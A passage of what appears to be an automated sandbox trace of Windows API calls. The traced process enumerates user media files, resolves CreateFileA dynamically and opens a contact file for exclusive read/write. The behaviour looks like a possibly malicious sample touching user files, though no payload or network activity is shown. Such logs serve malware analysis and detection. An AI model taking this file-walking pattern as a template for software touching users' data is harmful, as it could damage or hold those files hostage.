ftLastAccessTime.dwLowDateTime=0x6c66c1b0, ftLastAccessTime.dwHighDateTime=0x1d5e6cf, ftLastWriteTime.dwLowDateTime=0x6c66c1b0, ftLastWriteTime.dwHighDateTime=0x1d5e6cf, nFileSizeHigh=0x0, nFileSizeLow=0x4606, dwReserved0=0x8a0000, dwReserved1=0x8a7560, cFileName="J9c7.avi", cAlternateFileName="")) returned 1 [0157.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba8a0 [0157.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df2d0 [0157.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1e90 [0157.989] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e618 | out: lpFindFileData=0x87e618*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x30f21820, ftCreationTime.dwHighDateTime=0x1d5e6e1, ftLastAccessTime.dwLowDateTime=0xaa5959f0, ftLastAccessTime.dwHighDateTime=0x1d5e504, ftLastWriteTime.dwLowDateTime=0xaa5959f0, ftLastWriteTime.dwHighDateTime=0x1d5e504, nFileSizeHigh=0x0, nFileSizeLow=0x16b05, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="Syi8lj9.mkv", cAlternateFileName="")) returned 1 [0157.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba900 [0157.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0f0 [0157.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1e90 [0157.989] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e618 | out: lpFindFileData=0x87e618*(dwFileAttributes=0x11e0067, ftCreationTime.dwLowDateTime=0x53d6, ftCreationTime.dwHighDateTime=0x89fe58, ftLastAccessTime.dwLowDateTime=0x773d1ecd, ftLastAccessTime.dwHighDateTime=0x7e8b71, ftLastWriteTime.dwLowDateTime=0x11, ftLastWriteTime.dwHighDateTime=0x1260068, nFileSizeHigh=0x53d6, nFileSizeLow=0x23, dwReserved0=0x8a0000, dwReserved1=0x8a7560, cFileName="\x87\x08", cAlternateFileName="\x8d\x87ဓ+\x10")) returned 0 [0157.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba8a0 [0157.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba870 [0157.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1e90 [0157.990] FindClose (in: hFindFile=0x90af18 | out: hFindFile=0x90af18) returned 1 [0157.990] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e870 | out: lpFindFileData=0x87e870*(dwFileAttributes=0xf60078, ftCreationTime.dwLowDateTime=0x53ee, ftCreationTime.dwHighDateTime=0x8a7560, ftLastAccessTime.dwLowDateTime=0x53d9, ftLastAccessTime.dwHighDateTime=0x8, ftLastWriteTime.dwLowDateTime=0x356310, ftLastWriteTime.dwHighDateTime=0x1200079, nFileSizeHigh=0x53ee, nFileSizeLow=0x8a7250, dwReserved0=0x8a7364, dwReserved1=0x8a7560, cFileName="痠\x8a\x08", cAlternateFileName="\x8d\x87ဓ+\x10")) returned 0 [0157.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba6d8 [0157.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba6f0 [0157.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1e60 [0157.991] FindClose (in: hFindFile=0x90ae58 | out: hFindFile=0x90ae58) returned 1 [0157.991] FindNextFileW (in: hFindFile=0x90ad98, lpFindFileData=0x87eac8 | out: lpFindFileData=0x87eac8*(dwFileAttributes=0xe20089, ftCreationTime.dwLowDateTime=0x5406, ftCreationTime.dwHighDateTime=0x8a7560, ftLastAccessTime.dwLowDateTime=0x53f1, ftLastAccessTime.dwHighDateTime=0x8, ftLastWriteTime.dwLowDateTime=0x356310, ftLastWriteTime.dwHighDateTime=0xe8008a, nFileSizeHigh=0x5406, nFileSizeLow=0x8a7250, dwReserved0=0x8a7364, dwReserved1=0x8a7560, cFileName="痠\x8a\x08", cAlternateFileName="\x8d\x87ဓ+\x10")) returned 0 [0157.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9d30 [0157.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9dc0 [0157.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ca0 [0157.991] FindClose (in: hFindFile=0x90ad98 | out: hFindFile=0x90ad98) returned 1 [0157.992] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0157.992] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0157.992] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0157.992] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0157.992] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0157.992] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0157.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0157.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0157.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0157.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0157.993] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0157.993] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0157.993] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0157.993] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0157.993] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0157.993] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0157.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0157.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0157.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0157.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0157.993] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0157.993] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0157.993] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0157.993] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0157.993] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0157.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0157.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0157.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0157.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0157.993] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0157.993] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0157.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0157.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0157.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0157.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0157.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0157.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0157.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0157.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0157.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0157.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0157.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0157.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0157.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0157.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0157.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0157.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0157.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0157.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0157.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0157.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0157.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0157.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0157.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0157.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0157.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0157.995] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0157.995] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0157.995] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0157.995] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0157.995] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0157.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0157.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0157.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0157.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0157.996] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0157.996] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0157.996] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0157.996] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0157.996] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0157.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0157.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0157.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0157.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0157.996] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0157.996] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0157.996] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0157.997] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0157.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9ba018 [0157.997] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9ba018, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0157.997] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0157.997] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0157.997] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0157.997] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0157.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0157.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0157.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0157.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0157.997] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0157.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba018 [0157.997] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9ba018, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0157.998] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0157.998] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0157.998] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0157.998] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0157.998] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0157.998] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0157.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0157.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0157.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0157.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0157.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0157.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0157.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0157.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0157.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0x9c5180 [0157.999] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact", cchWideChar=63, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 63 [0157.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x3f) returned 0x8db0a8 [0157.999] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact", cchWideChar=63, lpMultiByteStr=0x8db0a8, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact", lpUsedDefaultChar=0x0) returned 63 [0157.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0157.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0157.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0157.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0157.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0157.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0158.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0158.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0158.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0158.000] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\aclviho asldjfl.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0158.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0158.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0158.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0158.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0158.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0158.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0158.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0158.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0158.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0158.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0158.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0158.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0158.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0158.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0158.002] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x9c5180, cbMultiByte=63, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 63 [0158.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x7e) returned 0x9c0c00 [0158.002] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x9c5180, cbMultiByte=63, lpWideCharStr=0x9c0c00, cchWideChar=63 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact") returned 63 [0158.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0158.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c88 [0158.003] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c00 | out: hHeap=0x8a0000) returned 1 [0158.003] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c5180 | out: hHeap=0x8a0000) returned 1 [0158.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0158.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0158.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0158.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0158.003] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0158.003] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0158.003] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0158.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0158.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0158.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0158.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0158.003] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0158.003] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0158.003] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0158.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0158.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0158.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0158.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0158.003] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0158.003] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0158.003] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0158.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0158.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0158.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0158.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0158.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0158.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0158.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0158.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0158.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0158.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0158.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0158.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0158.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0158.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0158.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0158.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0158.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0158.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0158.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0158.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0158.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0158.004] FreeLibrary (hLibModule=0x75990000) returned 1 [0158.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0158.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0158.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0158.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, 